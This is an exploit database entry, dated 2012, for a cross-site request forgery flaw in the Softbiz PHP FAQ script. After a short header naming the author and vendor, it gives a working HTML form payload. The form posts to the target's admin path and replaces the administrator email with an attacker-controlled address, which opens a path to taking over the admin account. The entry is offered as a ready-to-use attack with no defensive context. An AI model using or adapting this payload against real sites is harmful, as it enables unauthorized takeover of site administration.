Softbiz PHP FAQ CSRF Vulnerability



EKU-ID: 1822 CVE: OSVDB-ID:
Author: Jonturk75 Published: 2012-03-31 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Softbiz PHP FAQ CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/softbiz-simple-faq-script/32330/
# Category::  webapps
# Demo : http://www.softbizscripts.com/scripts/faq/admin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com




<form name="form2" method="post" action="target.com/admin/[PATH]" onSubmit="return validate();">
<input name="adminemail" class="box1" id="adminemail" value="khaled147@gawab.com" size="35" type="text">
<input name="Submit" class="submit" value="Update Configuration" type="submit">
</form>